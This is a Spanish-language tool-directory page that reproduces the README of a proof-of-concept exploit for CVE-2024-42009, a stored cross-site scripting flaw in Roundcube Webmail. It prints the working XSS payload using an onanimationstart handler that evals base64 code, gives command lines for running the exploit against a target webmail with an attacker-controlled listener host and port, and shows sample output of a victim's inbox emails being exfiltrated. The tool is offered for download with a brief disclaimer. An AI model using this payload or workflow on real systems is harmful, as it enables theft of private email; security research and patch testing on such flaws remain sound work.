Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-42009-PoC — CVE-2024-42009 Prueba de Concepto | Kitploit
Herramientas/GitHubGitHub/danithehack3r/cve-2024-42009-poc
Herramientas de PhishingExplotaciónExplotación de Aplicaciones WebExfiltración de DatosAprendizaje y EducaciónSeguridad de Correo Electrónico
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

CVE-2024-42009 Prueba de Concepto

Ver Repositorio
71hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-42009 PoC: Captura de Correo Electrónico y Exploit XSS en Roundcube Webmail

Resumen

Este repositorio contiene una prueba de concepto (PoC) para CVE-2024-42009, una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en Roundcube Webmail versión 1.6.7 y otras versiones. El exploit demuestra cómo un atacante puede inyectar JavaScript malicioso en un mensaje y aprovechar un problema de desanitización al analizar el HTML dentro del mensaje, lo que luego puede utilizarse para exfiltrar el contenido del correo electrónico de la bandeja de entrada de la víctima en este ejemplo, o incluso tomar el control del navegador de la víctima.

Detalles de la Vulnerabilidad

Descripción del CVE

Una vulnerabilidad de Cross-Site Scripting en Roundcube hasta la versión 1.5.7 y 1.6.x hasta 1.6.7 permite a un atacante remoto robar y enviar correos electrónicos de una víctima mediante un mensaje de correo electrónico manipulado que abusa de un problema de desanitización en message_body() en program/actions/mail/show.php.

Explicación del Payload XSS (para este ejemplo)

El exploit utiliza un disparador de animación CSS para la ejecución del XSS:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

El body se analiza como un div, por lo que debemos adaptarnos a ello. Es por eso que usamos el atributo onanimationstart para llamar a la función eval y ejecutar llamadas JavaScript complejas desde allí. Para obtener más información sobre cómo funciona el exploit y dónde están las vulnerabilidades en Roundcube, lea este artículo.

Alcance

  • Este exploit fue probado solo en Roundcube Webmail versión 1.6.7
  • La víctima debe abrir el mensaje para ver su contenido
  • Puede fallar si la Política de Seguridad de Contenido (CSP) está configurada correctamente

Uso

Dependencias

Instale los paquetes de Python requeridos:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

Argumentos de Línea de Comandos

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • URL de destino: En este caso usamos el endpoint del formulario de contacto que maneja los mensajes y luego los reenvía (por ejemplo, http://email.company.local/contact)
  • Correo del destinatario: Dirección de correo electrónico válida que recibirá el mensaje malicioso
  • Host del listener: Dirección IP de su máquina accesible desde el objetivo
  • Puerto del listener: Puerto disponible para el servidor HTTP (por ejemplo, 4444)

Ejemplo de Uso

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

Salida Esperada

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

Referencias

Investigación de la Vulnerabilidad

  • Blog de SonarSource: Government Emails at Risk - Critical Cross-Site Scripting Vulnerability in Roundcube Webmail
  • Video de Demostración de SonarSource

Aviso Legal

⚠️ IMPORTANTE: Esta prueba de concepto se proporciona únicamente con fines educativos y de pruebas autorizadas. Úsela de manera responsable y esta cuenta no se hace responsable de ningún daño causado por terceros.

Descargar herramienta